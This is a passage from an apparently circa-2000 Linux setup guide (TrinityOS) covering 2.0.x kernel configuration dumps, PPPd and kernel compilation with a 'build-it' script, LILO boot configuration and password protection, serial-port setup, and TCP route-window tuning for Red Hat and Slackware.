CONFIG_ARPD is not set CONFIG_SYN_COOKIES=y # CONFIG_INET_RARP is not set CONFIG_SKB_LARGE=y # CONFIG_IPV6 is not set # CONFIG_IPX is not set # CONFIG_ATALK is not set # CONFIG_X25 is not set # CONFIG_LAPB is not set # CONFIG_BRIDGE is not set # CONFIG_LLC is not set # CONFIG_ECONET is not set # CONFIG_WAN_ROUTER is not set # CONFIG_NET_FASTROUTE is not set # CONFIG_NET_HW_FLOWCONTROL is not set # CONFIG_CPU_IS_SLOW is not set # # QoS and/or fair queueing # # CONFIG_NET_SCHED is not set # # SCSI support # CONFIG_SCSI=y CONFIG_BLK_DEV_SD=y CONFIG_CHR_DEV_ST=y CONFIG_BLK_DEV_SR=y # CONFIG_BLK_DEV_SR_VENDOR is not set # CONFIG_CHR_DEV_SG is not set # CONFIG_SCSI_MULTI_LUN is not set CONFIG_SCSI_CONSTANTS=y # CONFIG_SCSI_LOGGING is not set # # SCSI low-level drivers # # CONFIG_SCSI_7000FASST is not set # CONFIG_SCSI_ACARD is not set # CONFIG_SCSI_AHA152X is not set CONFIG_SCSI_AHA1542=y # CONFIG_SCSI_AHA1740 is not set CONFIG_SCSI_AIC7XXX=y CONFIG_AIC7XXX_TCQ_ON_BY_DEFAULT=y CONFIG_AIC7XXX_CMDS_PER_DEVICE=8 CONFIG_AIC7XXX_PROC_STATS=y CONFIG_AIC7XXX_RESET_DELAY=5 # CONFIG_SCSI_IPS is not set # CONFIG_SCSI_ADVANSYS is not set # CONFIG_SCSI_IN2000 is not set # CONFIG_SCSI_AM53C974 is not set # CONFIG_SCSI_MEGARAID is not set # CONFIG_SCSI_BUSLOGIC is not set # CONFIG_SCSI_DTC3280 is not set # CONFIG_SCSI_EATA is not set # CONFIG_SCSI_EATA_DMA is not set # CONFIG_SCSI_EATA_PIO is not set # CONFIG_SCSI_FUTURE_DOMAIN is not set # CONFIG_SCSI_GDTH is not set # CONFIG_SCSI_GENERIC_NCR5380 is not set # CONFIG_SCSI_INITIO is not set # CONFIG_SCSI_INIA100 is not set # CONFIG_SCSI_PPA is not set # CONFIG_SCSI_IMM is not set # CONFIG_SCSI_NCR53C406A is not set # CONFIG_SCSI_SYM53C416 is not set # CONFIG_SCSI_SIM710 is not set # CONFIG_SCSI_NCR53C7xx is not set # CONFIG_SCSI_NCR53C8XX is not set # CONFIG_SCSI_SYM53C8XX is not set # CONFIG_SCSI_PAS16 is not set # CONFIG_SCSI_PCI2000 is not set # CONFIG_SCSI_PCI2220I is not set # CONFIG_SCSI_PSI240I is not set # CONFIG_SCSI_QLOGIC_FAS is not set # CONFIG_SCSI_QLOGIC_ISP is not set # CONFIG_SCSI_QLOGIC_FC is not set # CONFIG_SCSI_SEAGATE is not set # CONFIG_SCSI_DC390T is not set # CONFIG_SCSI_T128 is not set # CONFIG_SCSI_U14_34F is not set # CONFIG_SCSI_ULTRASTOR is not set # CONFIG_SCSI_DEBUG is not set # # Network device support # CONFIG_NETDEVICES=y # # ARCnet devices # # CONFIG_ARCNET is not set CONFIG_DUMMY=m # CONFIG_EQUALIZER is not set # CONFIG_ETHERTAP is not set # CONFIG_NET_SB1000 is not set # # Ethernet (10 or 100Mbit) # CONFIG_NET_ETHERNET=y CONFIG_NET_VENDOR_3COM=y # CONFIG_EL1 is not set # CONFIG_EL2 is not set # CONFIG_ELPLUS is not set # CONFIG_EL16 is not set # CONFIG_EL3 is not set # CONFIG_3C515 is not set CONFIG_VORTEX=y # CONFIG_LANCE is not set # CONFIG_NET_VENDOR_SMC is not set # CONFIG_NET_VENDOR_RACAL is not set # CONFIG_RTL8139 is not set # CONFIG_SIS900 is not set # CONFIG_YELLOWFIN is not set # CONFIG_NET_ISA is not set # CONFIG_NET_EISA is not set # CONFIG_NET_POCKET is not set # CONFIG_FDDI is not set # CONFIG_HIPPI is not set # CONFIG_PLIP is not set CONFIG_PPP=y # CONFIG_SLIP is not set # CONFIG_NET_RADIO is not set # # Token ring devices # # CONFIG_TR is not set # CONFIG_NET_FC is not set # CONFIG_RCPCI is not set # CONFIG_SHAPER is not set # # Wan interfaces # # CONFIG_HOSTESS_SV11 is not set # CONFIG_COSA is not set # CONFIG_SEALEVEL_4021 is not set # CONFIG_DLCI is not set # CONFIG_SBNI is not set # # Amateur Radio support # # CONFIG_HAMRADIO is not set # # IrDA subsystem support # # CONFIG_IRDA is not set # # ISDN subsystem # # CONFIG_ISDN is not set # # Old CD-ROM drivers (not SCSI, not IDE) # # CONFIG_CD_NO_IDESCSI is not set # # Character devices # CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_SERIAL=y # CONFIG_SERIAL_CONSOLE is not set # CONFIG_SERIAL_EXTENDED is not set # CONFIG_SERIAL_NONSTANDARD is not set CONFIG_UNIX98_PTYS=y CONFIG_UNIX98_PTY_COUNT=256 CONFIG_PRINTER=y # CONFIG_PRINTER_READBACK is not set CONFIG_MOUSE=y # # Mice # # CONFIG_ATIXL_BUSMOUSE is not set # CONFIG_BUSMOUSE is not set # CONFIG_MS_BUSMOUSE is not set CONFIG_PSMOUSE=y # CONFIG_82C710_MOUSE is not set # CONFIG_PC110_PAD is not set # CONFIG_QIC02_TAPE is not set # CONFIG_WATCHDOG is not set # CONFIG_NVRAM is not set CONFIG_RTC=y # # Video For Linux # # CONFIG_VIDEO_DEV is not set # # Joystick support # # CONFIG_JOYSTICK is not set # CONFIG_DTLK is not set # # Ftape, the floppy tape device driver # # CONFIG_FTAPE is not set # # Filesystems # # CONFIG_QUOTA is not set CONFIG_AUTOFS_FS=y # CONFIG_ADFS_FS is not set # CONFIG_AFFS_FS is not set # CONFIG_HFS_FS is not set CONFIG_FAT_FS=y CONFIG_MSDOS_FS=y # CONFIG_UMSDOS_FS is not set CONFIG_VFAT_FS=y CONFIG_ISO9660_FS=y CONFIG_JOLIET=y # CONFIG_MINIX_FS is not set # CONFIG_NTFS_FS is not set # CONFIG_HPFS_FS is not set CONFIG_PROC_FS=y CONFIG_DEVPTS_FS=y # CONFIG_QNX4FS_FS is not set # CONFIG_ROMFS_FS is not set CONFIG_EXT2_FS=y # CONFIG_SYSV_FS is not set # CONFIG_UFS_FS is not set # CONFIG_EFS_FS is not set # # Network File Systems # # CONFIG_CODA_FS is not set CONFIG_NFS_FS=y CONFIG_NFSD=y # CONFIG_NFSD_SUN is not set CONFIG_SUNRPC=y CONFIG_LOCKD=y CONFIG_SMB_FS=y # CONFIG_NCP_FS is not set # # Partition Types # # CONFIG_BSD_DISKLABEL is not set # CONFIG_MAC_PARTITION is not set # CONFIG_SMD_DISKLABEL is not set # CONFIG_SOLARIS_X86_PARTITION is not set # CONFIG_UNIXWARE_DISKLABEL is not set CONFIG_NLS=y # # Native Language Support # CONFIG_NLS_CODEPAGE_437=y # CONFIG_NLS_CODEPAGE_737 is not set # CONFIG_NLS_CODEPAGE_775 is not set # CONFIG_NLS_CODEPAGE_850 is not set # CONFIG_NLS_CODEPAGE_852 is not set # CONFIG_NLS_CODEPAGE_855 is not set # CONFIG_NLS_CODEPAGE_857 is not set # CONFIG_NLS_CODEPAGE_860 is not set # CONFIG_NLS_CODEPAGE_861 is not set # CONFIG_NLS_CODEPAGE_862 is not set # CONFIG_NLS_CODEPAGE_863 is not set # CONFIG_NLS_CODEPAGE_864 is not set # CONFIG_NLS_CODEPAGE_865 is not set # CONFIG_NLS_CODEPAGE_866 is not set # CONFIG_NLS_CODEPAGE_869 is not set # CONFIG_NLS_CODEPAGE_874 is not set CONFIG_NLS_ISO8859_1=y # CONFIG_NLS_ISO8859_2 is not set # CONFIG_NLS_ISO8859_3 is not set # CONFIG_NLS_ISO8859_4 is not set # CONFIG_NLS_ISO8859_5 is not set # CONFIG_NLS_ISO8859_6 is not set # CONFIG_NLS_ISO8859_7 is not set # CONFIG_NLS_ISO8859_8 is not set # CONFIG_NLS_ISO8859_9 is not set # CONFIG_NLS_ISO8859_14 is not set # CONFIG_NLS_ISO8859_15 is not set # CONFIG_NLS_KOI8_R is not set # # Console drivers # CONFIG_VGA_CONSOLE=y CONFIG_VIDEO_SELECT=y # CONFIG_MDA_CONSOLE is not set # CONFIG_FB is not set # # Sound # CONFIG_SOUND=y # CONFIG_SOUND_CMPCI is not set # CONFIG_SOUND_ES1370 is not set # CONFIG_SOUND_ES1371 is not set # CONFIG_SOUND_ESSSOLO1 is not set # CONFIG_SOUND_SONICVIBES is not set # CONFIG_SOUND_MSNDCLAS is not set # CONFIG_SOUND_MSNDPIN is not set CONFIG_SOUND_OSS=y # CONFIG_SOUND_DMAP is not set # CONFIG_SOUND_PAS is not set CONFIG_SOUND_SB=y CONFIG_SB_BASE=220 CONFIG_SB_IRQ=5 CONFIG_SB_DMA=1 CONFIG_SB_DMA2=0 CONFIG_SB_MPU_BASE=330 CONFIG_SB_MPU_IRQ=-1 # CONFIG_SOUND_ADLIB is not set # CONFIG_SOUND_GUS is not set # CONFIG_SOUND_MPU401 is not set # CONFIG_SOUND_PSS is not set # CONFIG_SOUND_MSS is not set # CONFIG_SOUND_SSCAPE is not set # CONFIG_SOUND_TRIX is not set # CONFIG_SOUND_VIA82CXXX is not set # CONFIG_SOUND_MAD16 is not set # CONFIG_SOUND_WAVEFRONT is not set # CONFIG_SOUND_CS4232 is not set # CONFIG_SOUND_OPL3SA2 is not set # CONFIG_SOUND_MAUI is not set # CONFIG_SOUND_SGALAXY is not set # CONFIG_SOUND_AD1816 is not set # CONFIG_SOUND_OPL3SA1 is not set # CONFIG_SOUND_SOFTOSS is not set # CONFIG_SOUND_YM3812 is not set # CONFIG_SOUND_VMIDI is not set # CONFIG_SOUND_UART6850 is not set # CONFIG_SOUND_NM256 is not set # # Additional low level sound drivers # # CONFIG_LOWLEVEL_SOUND is not set # # Kernel hacking # # CONFIG_MAGIC_SYSRQ is not set ----- ** This config reflects a IPPORTFW and LooseUDP patched 2.0.38 kernel ** /usr/src/linux/.config -------- # # Automatically generated by make menuconfig: don't edit # # # Code maturity level options # CONFIG_EXPERIMENTAL=y # # Loadable module support # CONFIG_MODULES=y # CONFIG_MODVERSIONS is not set # CONFIG_KERNELD is not set # # General setup # # CONFIG_MATH_EMULATION is not set CONFIG_MEM_STD=y # CONFIG_MEM_ENT is not set # CONFIG_MEM_SPECIAL is not set CONFIG_MAX_MEMSIZE=1024 CONFIG_NET=y # CONFIG_MAX_16M is not set # CONFIG_PCI is not set CONFIG_SYSVIPC=y CONFIG_BINFMT_AOUT=y CONFIG_BINFMT_ELF=y # CONFIG_BINFMT_JAVA is not set CONFIG_KERNEL_ELF=y # CONFIG_M386 is not set CONFIG_M486=y # CONFIG_M586 is not set # CONFIG_M686 is not set # CONFIG_APM is not set # # Floppy, IDE, and other block devices # CONFIG_BLK_DEV_FD=y CONFIG_BLK_DEV_IDE=y # CONFIG_BLK_DEV_HD_IDE is not set CONFIG_BLK_DEV_IDECD=y # CONFIG_BLK_DEV_IDETAPE is not set # CONFIG_BLK_DEV_IDEFLOPPY is not set # CONFIG_BLK_DEV_IDESCSI is not set # CONFIG_BLK_DEV_IDE_PCMCIA is not set # CONFIG_BLK_DEV_CMD640 is not set # CONFIG_IDE_CHIPSETS is not set CONFIG_BLK_DEV_LOOP=m CONFIG_BLK_DEV_MD=y CONFIG_MD_LINEAR=y CONFIG_MD_STRIPED=y CONFIG_MD_MIRRORING=y CONFIG_MD_RAID5=y CONFIG_BLK_DEV_RAM=y CONFIG_BLK_DEV_INITRD=y # CONFIG_BLK_DEV_XD is not set # CONFIG_BLK_CPQ_DA is not set # CONFIG_PARIDE is not set # CONFIG_BLK_DEV_HD is not set # # Networking options # CONFIG_FIREWALL=y CONFIG_NET_ALIAS=y CONFIG_INET=y CONFIG_IP_FORWARD=y CONFIG_IP_MULTICAST=y CONFIG_SYN_COOKIES=y CONFIG_IP_FIREWALL=y CONFIG_IP_FIREWALL_VERBOSE=y CONFIG_IP_MASQUERADE=y # CONFIG_IP_MASQUERADE_IPAUTOFW is not set CONFIG_IP_MASQUERADE_IPPORTFW=y # CONFIG_IP_MASQUERADE_PPTP is not set # CONFIG_IP_MASQUERADE_IPSEC is not set CONFIG_IP_MASQUERADE_ICMP=y # CONFIG_IP_TRANSPARENT_PROXY is not set CONFIG_IP_MASQ_LOOSE_UDP=y CONFIG_IP_ALWAYS_DEFRAG=y # CONFIG_IP_ACCT is not set CONFIG_IP_ROUTER=y # CONFIG_NET_IPIP is not set # CONFIG_IP_MROUTE is not set CONFIG_IP_ALIAS=y # CONFIG_INET_PCTCP is not set # CONFIG_INET_RARP is not set # CONFIG_NO_PATH_MTU_DISCOVERY is not set CONFIG_IP_NOSR=y CONFIG_SKB_LARGE=y # CONFIG_IPX is not set # CONFIG_ATALK is not set # CONFIG_AX25 is not set # CONFIG_BRIDGE is not set # CONFIG_NETLINK is not set # # SCSI support # CONFIG_SCSI=y CONFIG_BLK_DEV_SD=y CONFIG_CHR_DEV_ST=y CONFIG_BLK_DEV_SR=y # CONFIG_CHR_DEV_SG is not set # CONFIG_SCSI_MULTI_LUN is not set CONFIG_SCSI_CONSTANTS=y # # SCSI low-level drivers # # CONFIG_SCSI_7000FASST is not set # CONFIG_SCSI_ACARD is not set # CONFIG_SCSI_AHA152X is not set # CONFIG_SCSI_AHA1542 is not set # CONFIG_SCSI_AHA1740 is not set CONFIG_SCSI_AIC7XXX=y CONFIG_AIC7XXX_TCQ_ON_BY_DEFAULT=y CONFIG_AIC7XXX_CMDS_PER_DEVICE=8 CONFIG_AIC7XXX_PROC_STATS=y CONFIG_AIC7XXX_RESET_DELAY=5 # CONFIG_SCSI_ADVANSYS is not set # CONFIG_SCSI_IN2000 is not set # CONFIG_SCSI_AM53C974 is not set # CONFIG_SCSI_MEGARAID is not set # CONFIG_SCSI_BUSLOGIC is not set # CONFIG_SCSI_DTC3280 is not set # CONFIG_SCSI_EATA_DMA is not set # CONFIG_SCSI_EATA_PIO is not set # CONFIG_SCSI_EATA is not set # CONFIG_SCSI_FUTURE_DOMAIN is not set # CONFIG_SCSI_GENERIC_NCR5380 is not set # CONFIG_SCSI_INITIO is not set # CONFIG_SCSI_INIA100 is not set # CONFIG_SCSI_NCR53C406A is not set # CONFIG_SCSI_SYM53C416 is not set # CONFIG_SCSI_PPA is not set # CONFIG_SCSI_PAS16 is not set # CONFIG_SCSI_PCI2000 is not set # CONFIG_SCSI_PCI2220I is not set # CONFIG_SCSI_PSI240I is not set # CONFIG_SCSI_QLOGIC_FAS is not set # CONFIG_SCSI_SEAGATE is not set # CONFIG_SCSI_T128 is not set # CONFIG_SCSI_TC2550 is not set # CONFIG_SCSI_U14_34F is not set # CONFIG_SCSI_ULTRASTOR is not set # CONFIG_SCSI_GDTH is not set # # Network device support # CONFIG_NETDEVICES=y CONFIG_DUMMY=m # CONFIG_EQUALIZER is not set # CONFIG_DLCI is not set # CONFIG_PLIP is not set CONFIG_PPP=y # CONFIG_SLIP is not set # CONFIG_NET_RADIO is not set CONFIG_NET_ETHERNET=y CONFIG_NET_VENDOR_3COM=y # CONFIG_EL1 is not set # CONFIG_EL2 is not set # CONFIG_ELPLUS is not set # CONFIG_EL16 is not set CONFIG_EL3=y # CONFIG_3C515 is not set # CONFIG_VORTEX is not set # CONFIG_NET_VENDOR_SMC is not set # CONFIG_NET_PCI is not set # CONFIG_NET_ISA is not set # CONFIG_NET_EISA is not set # CONFIG_NET_POCKET is not set # CONFIG_TR is not set # CONFIG_FDDI is not set # CONFIG_ARCNET is not set # CONFIG_SHAPER is not set # CONFIG_RCPCI is not set # # ISDN subsystem # # CONFIG_ISDN is not set # # CD-ROM drivers (not for SCSI or IDE/ATAPI drives) # # CONFIG_CD_NO_IDESCSI is not set # # Filesystems # # CONFIG_QUOTA is not set CONFIG_MINIX_FS=y # CONFIG_EXT_FS is not set CONFIG_EXT2_FS=y # CONFIG_XIA_FS is not set CONFIG_NLS=y CONFIG_ISO9660_FS=y CONFIG_FAT_FS=y CONFIG_MSDOS_FS=y # CONFIG_UMSDOS_FS is not set CONFIG_VFAT_FS=y # # Select available code pages # # CONFIG_NLS_CODEPAGE_437 is not set # CONFIG_NLS_CODEPAGE_737 is not set # CONFIG_NLS_CODEPAGE_775 is not set # CONFIG_NLS_CODEPAGE_850 is not set # CONFIG_NLS_CODEPAGE_852 is not set # CONFIG_NLS_CODEPAGE_855 is not set # CONFIG_NLS_CODEPAGE_857 is not set # CONFIG_NLS_CODEPAGE_860 is not set # CONFIG_NLS_CODEPAGE_861 is not set # CONFIG_NLS_CODEPAGE_862 is not set # CONFIG_NLS_CODEPAGE_863 is not set # CONFIG_NLS_CODEPAGE_864 is not set # CONFIG_NLS_CODEPAGE_865 is not set # CONFIG_NLS_CODEPAGE_866 is not set # CONFIG_NLS_CODEPAGE_869 is not set # CONFIG_NLS_CODEPAGE_874 is not set # CONFIG_NLS_ISO8859_1 is not set # CONFIG_NLS_ISO8859_2 is not set # CONFIG_NLS_ISO8859_3 is not set # CONFIG_NLS_ISO8859_4 is not set # CONFIG_NLS_ISO8859_5 is not set # CONFIG_NLS_ISO8859_6 is not set # CONFIG_NLS_ISO8859_7 is not set # CONFIG_NLS_ISO8859_8 is not set # CONFIG_NLS_ISO8859_9 is not set # CONFIG_NLS_ISO8859_15 is not set # CONFIG_NLS_KOI8_R is not set CONFIG_PROC_FS=y CONFIG_NFS_FS=y # CONFIG_ROOT_NFS is not set CONFIG_SMB_FS=y CONFIG_SMB_WIN95=y # CONFIG_HPFS_FS is not set # CONFIG_SYSV_FS is not set # CONFIG_AUTOFS_FS is not set # CONFIG_AFFS_FS is not set # CONFIG_UFS_FS is not set # # Character devices # CONFIG_SERIAL=y # CONFIG_SERIAL_PCI is not set # CONFIG_DIGI is not set # CONFIG_CYCLADES is not set # CONFIG_ISI is not set # CONFIG_STALDRV is not set # CONFIG_RISCOM8 is not set CONFIG_PRINTER=y # CONFIG_SPECIALIX is not set # CONFIG_MOUSE is not set # CONFIG_UMISC is not set # CONFIG_QIC02_TAPE is not set # CONFIG_FTAPE is not set # CONFIG_WATCHDOG is not set CONFIG_RTC=y # # Sound # CONFIG_SOUND=y # CONFIG_PAS is not set CONFIG_SB=y # CONFIG_ADLIB is not set # CONFIG_GUS is not set # CONFIG_MPU401 is not set # CONFIG_UART6850 is not set # CONFIG_PSS is not set # CONFIG_GUS16 is not set # CONFIG_GUSMAX is not set # CONFIG_MSS is not set # CONFIG_SSCAPE is not set # CONFIG_TRIX is not set # CONFIG_MAD16 is not set # CONFIG_CS4232 is not set # CONFIG_MAUI is not set CONFIG_AUDIO=y # CONFIG_MIDI is not set CONFIG_YM3812=y SBC_BASE=220 SBC_IRQ=10 SBC_DMA=1 SB_DMA2=5 SB_MPU_BASE=0 SB_MPU_IRQ=-1 DSP_BUFFSIZE=65536 # CONFIG_LOWLEVEL_SOUND is not set # # Kernel hacking # # CONFIG_PROFILE is not set ------------ - [ OPTIONAL -- You only need to do this if you have an ancient SoundBlaster-type CDROM drive ] - edit /usr/src/linux/include/linux/sbpcd.h (as of kernel 2.0.38) - Roughly at line 77, verify the top most SB address and CDROM port is correct. - Roughly at line 107, change the "#define DISTRIBUTION" variable to "0" to reflect that you have configured the sound drivers - Roughly at line 121 and 128, change ALL eject line variable to "0" so the drives won't eject their CDs Now we need to shift gears and jump to the PPP code installation to verify if there is any newer code in the PPP distribution than the kernel distribution. - Kernel 2.0.35 didn't come with the new v1.16 3Com driver. Bummer. It was pulled because of problems but I haven't had any and there are a LOT of fixes in it. So.. do the following: - mv /usr/src/linux/drivers/net/3c509.c /usr/src/linux/drivers/net/3c509.c.orig - Download the new driver from: ftp://cesdis.gsfc.nasa.gov/pub/linux/drivers/3c509.c If, for some reason, the drive is not available, email me and I'll mail it to you. ************************* ================================================================================ Section 13 - Compile PPPd - Download the newest PPP sources from the URL in [Section 5] and put it in "/usr/src" - "tar -xvzf ppp-2.3.x.tar.gz" - "cd ppp-2.3.x" - "configure" - Now, some patches won't need to be installed based upon the version of PPPD and/or the Linux kernel they are installing. - "make kernel" This will update any of the required kernel code to work with this version of PPPd. - "make" NOTE: You can use "make USE_MS_DNS=1" to insure your system uses the ISP's offered DNS servers over your statically-configure. Remember, since TrinityOS will run it's OWN DNS server, it really won't matter. - "make install" Ok.. now back to the kernel configuring for now.. ================================================================================ ================================================================================ Section 14 - Final Linux Kernel compiling and installation Time to compile the kernel. You can do it manually via the following commands or use the "built-it" script given below. "cd /usr/src/linux" "make clean" "make dep" "make bzImage" and allow for the kernel to compile (~3mins on a P-II 233) - Now, compile and install the necessary system modules: "cd /usr/src/linux" "make modules" "make modules_install" - Once the kernel has compiled, do the following command line (replacing "XYZ" with an identifing name like "2035-masq": Slackware: "cp /usr/src/linux/arch/i386/boot/bzImage /XYZ" Redhat: "cp /usr/src/linux/arch/i386/boot/bzImage /boot/XYZ" If you would like to automate this process in the future, create this script in /usr/src and run it once you have configured your new kernel. NOTE: You will want to create the directory /usr/src/config to store your configured kernel setups. This is a good way to find out what is and isn't enabled in a given kernel. /usr/src/build-it -- #!/bin/sh # # Version: 01/17/00 # # Part of the copyrighted and servicemarked TrinityOS document. # http://www.ecst.csuchico.edu/~dranch # # Written and Maintained by David A. Ranch # dranch@trinnet.net # # Updates: # # 01/17/00 - Changed the date to use %d over %e and remove any spaces # in the date format. # # - Changed the layout a little and added some beeps at the end # cd /usr/src/linux date > /usr/src/kernel-compile-time.`date +'%b%d'` #Make sure the /usr/src/config directory exists. cp /usr/src/linux/.config /usr/src/config/kernel.`date +'%b%d'` make dep; make clean; make bzImage cp /usr/src/linux/arch/i386/boot/bzImage /boot/bzImage cp /usr/src/linux/System.map /boot/System.map.new make modules; make modules_install date >> /usr/src/kernel-compile-time.`date +'%b%d'` echo Compile Done. echo Rename /boot/bzImage to correct name and edit /etc/lilo.conf, echo then rename /boot/System.map.new to /boot/System.map, and re-run lilo. # # NOTE: To make these beep work, edit this file under "vi" and type in # Control-Q and then Control-G for each ^G shown # echo ^G sleep 1 echo ^G sleep 1 echo ^G -- Don't forget.. "chmod 700 /usr/src/build-it" To run the script, run it as "./built-it" ================================================================================ Section 15 - Lilo configuration and installation Lilo is the typical boot loader for Linux though you don't have to use it. You can also use other loaders like: - Systerm commander - Microsoft NT's boot loader - IBM OS/2's boot loader - boot into DOS and then use Loadlin - Edit the /etc/lilo.conf file to reflect your new kernel. **NOTE: If you aren't using LILO, you need to configure your boot method (loadlin, NT boot loader, OS/2 boot loader, System Commander, etc) to use this new kernel. **NOTE#2: If you have any DOS LILO enties, I highly recommend to password protect them as shown below. - Add an entry like below : -- # LILO configuration file # generated by 'liloconfig' # # Start LILO global section boot = /dev/hda #My box needs this since I have two 3c509 cards append="ether=0,0,eth1" #compact # faster, but won't work on all systems. delay = 50 vga = normal # force sane state # ramdisk = 0 # paranoia setting # End LILO global section # Linux bootable partition config begins image = /2035-1542-sb16 root = /dev/hda6 label = linux read-only # Non-UMSDOS filesystems should be mounted read-only for checking # Linux bootable partition config ends other=/dev/hda1 label=dos password=g3a0uttahere table=/dev/hda -- Two or more NICs: For a secure system, you should have (2) ethernet cards installed. One to the cablemodem and the other for the internal LAN. If both installed Ethernet cards from different vendors, then skip this next part. If your two Ethernet cards are identical and you compiled support for them into the kernle, Linux will only autodetect ONE card. To make Linux look for additional ethernet cards, add the following to the lilo.conf file: append="ether=0,0,eth1" If you are using Redhat's dynamic kernel modules to support your network cards, do the following instead: /etc/conf.modules -- alias eth1 3c509 -- This says eth1 is a 3Com 3c509. If it uses non-standard addresses, IRQs, etc, you can specify their locations: /etc/conf.modules -- options 3c509 io=0x300,12 -- Missing Memory: When you boot your machine and run a "dmesg" or a "free" and you don't see all your installed RAM, do the following. This example is for a system with 40MB of RAM.. /etc/lilo.conf -- append="mem=40M" -- - Run the LILO program by simply entering "lilo" at the command prompt to re-write your boot sector. If everything is ok, you will be given a short list of boot images that LILO will boot from. Before you reboot your box, I *highly* recommend you create a boot disk that will use the kernel off the diskette BUT mount your Linux parition on the hard drive. A RESCUE diskette will NOT let you fix LILO problems. Sucks but its true! Additional Security: LILO has a feature to password itself. Without the password given, the machine will boot into its configured kernel image. To enable this, edit in the following: /etc/lilo.conf -- restricted password=xxxx -- Change the "xxx" to a password of your choice. The "restricted" word enables the passwording. Since the password is saved in CLEAR-TEXT, make sure no one else can read it by doing the following: chmod 700 /etc/lilo.conf LILO booting problems? "LI" - Getting this when you are rebooting? This realistically is happening because the hard drive geometry in the CMOS setup is different than reported by the kernel booting up. To fix this, add the following line after the "VGA=normal" line: /etc/lilo.conf -- linear -- If this doesn't help you, check out the LILO docs. Its kinda long but you can just skip down to roughly 93% of it and see what all the LILO codes mean. /usr/doc/lilo-*/README ================================================================================ Section 16 - Additional RC script configuration and TCP/IP network optimization Since my system uses all (4) COMM ports and Linux doesn't like to share interupts (IRQs), you have to tell Linux how to use your specific hardware setup. In addition to configuring Linux to understand your hardware setup, you need to optimize it for maximum performance (serial ports, etc). NOTE: Until I added these changes, both GPM (tty mouse program) and Xwindows (Xfree86, MetroX, etc) would not load correctly let alone be useful. Serial Port Optimizations: -------------------------- NOTE: Starting with later 2.1.x and 2.2.x kernels, you do NOT have to set up the follow parameters to get 115,200 on serial ports. If you call the ports via Minicom, PPP, etc at 115,200, it will just work!! BUT.. by setting these files up, any application that asks for 38,400 will actually get 115,200. For 2.2.x and 2.0.x kernels /etc/rc.d/rc.serial file: -- #!/bin/sh SETSERIAL="/bin/setserial -b" echo "Configuring COM1 for 115200" ${SETSERIAL} /dev/ttyS0 spd_vhi #echo "RE-configuring COM3 and COM4 to use proper IRQs" #${SETSERIAL} /dev/ttyS2 uart 16450 port 0x3E8 irq 3 #${SETSERIAL} /dev/ttyS3 uart 16550A port 0x2E8 irq 5 ${SETSERIAL} -bg /dev/ttyS0 /dev/ttyS1 /dev/ttyS2 /dev/ttyS3 echo "rc.serial done." ---- Make it executable chmod 700 /etc/rc.d/rc.serial Redhat: Do a search for "rc.serial" in the /etc/rc.d/rc.sysinit file. If it isn't there, add it at the bottom. /etc/rc.d/rc.sysinit -- # Initialize the serial subsystem /etc/rc.d/rc.serial -- Since I use an older Logitech C7 mouse, Linux doesn't come on-line with it the first time. Edit this to suit your hardware configs. Fix this by doing: Redhat: Edit /etc/rc.d/init.d/gpm replace this: daemon gpm -t $MOUSETYPE with this: daemon gpm -b 9600 -r 50 -t $MOUSETYPE Slackware: Edit /etc/rc.d/rc.local replace this: gpm -t logi with gpm -b 9600 -r 50 -t $logi Network Optimization: --------------------- Ethernet NIC Vendor Specific: Most 3Com ethernet ISA and PCI NICs have a ---------------- DOS based utility that allows you to enable/disable Plug and Play, manually configure IO ports, IRQs, and specify both the IRQ utilization and priority. Personally.. I always recommend to DISABLE Plug and Play and manually configure the cards as depicted in [Section 4]. Anyway, I also recommend the following: Serial-attached analog/isdn modem users: - Set your ethernet cards to support a modem IRQ utiliztion for 19200 or faster - Set your NIC optimization for SERVER Ethernet Router/cable-modem users: - Set your ethernet cards to for NO modem - Set your NIC optimization for SERVER ---- Brief Overview: - The Modem speed section tells the ethernet card NOT to hog the IRQ lines too much. Though most PC serial ports have 16550 or better chipsets, if the serial port is ignored for too long, data will be lost. - The Optimization field tells the NIC how to utilize things like IRQ duration, DMA bus retention, etc. The Server setting will optimize the NIC for fastest performance at the detriment of CPU utilization. This is the BEST setting for Linux boxes that are doing IP Masq, routing, etc. TCP/IP Stack specific: ---------------------- Both Slackware and Redhat, out of the box, do NOT optimize the TCP/IP window size. This can make a BIG difference with performance. For more information, check out [URLs in Section 5]: RFC 1106 - High Latency WAN links - Section 4.1 RFC 793 - Transmission Control Protocol Redhat: NOTE: Users that have NOT installed the initscripts-3.67-1.i386.rpm patch RPM, the correct line numbers will be 119 and 134. Personally, I recommend that you just install the RPM NOW! Edit "/etc/sysconfig/network-scripts/ifup" and around lines 134, 136, 141, 149, and 158, find the lines: line 134 for Redhat 5 or line 157 for Mandrake 7: ----------------------------------------------------------------------- "route add -net ${NETWORK} netmask ${NETMASK} ${DEVICE}" to: "route add -net ${NETWORK} netmask ${NETMASK} window 16384 ${DEVICE}" ----------------------------------------------------------------------- line 136 for Redhat 5 or line 157 for Mandrake 7: ----------------------------------------------------------------------- "route add -host ${IPADDR} ${DEVICE}" to: "route add -host ${IPADDR} window 16384 ${DEVICE}" ----------------------------------------------------------------------- line 141 for Redhat 5 or line 162 for Mandrake 7: ----------------------------------------------------------------------- "route add default gw ${GATEWAY} metric 1 ${DEVICE}" to: "route add default gw ${GATEWAY} window 16384 metric 1 ${DEVICE}" ----------------------------------------------------------------------- line 149 for Redhat 5 or line 170 for Mandrake 7: ----------------------------------------------------------------------- "route add default gw ${GATEWAY} ${DEVICE}" to: "route add default gw ${GATEWAY} window 16384 ${DEVICE}" ----------------------------------------------------------------------- line 158 in Redhat 5 or line 173 in Mandrake 7 ----------------------------------------------------------------------- "route add default gw $gw ${DEVICE}" to: "route add default gw $gw window 16384 ${DEVICE}" ----------------------------------------------------------------------- Slackware: Edit /etc/rc.d/rc.inet1" and around lines 47 and 49, find the following text (note: your setup might look a little different so make any changes that are needed for your setup) "/sbin/route add -net ${NETWORK} netmask ${NETMASK} eth0" and "if [ ! "$GATEWAY" = "" ]; then /sbin/route add default gw ${GATEWAY} netmask 0.0.0.0 metric 1 fi" and replace them with the following: "/sbin/route add -net ${NETWORK} netmask ${NETMASK} window 16384 eth0" and "if [ ! "$GATEWAY" = "" ]; then /sbin/route add default gw ${GATEWAY} netmask 0.0.0.0 window 16384 metric 1 fi" After everything is set and you either run these commands manually or reboot, a "netstat -rn" should look something like: -- Kernel IP routing table Destination Gateway Genmask Flags MSS Window irtt Iface 100.200.0.0 0.0.0.0 255.255.255.0 U 1500 16384 0 eth0 127.0.0.0 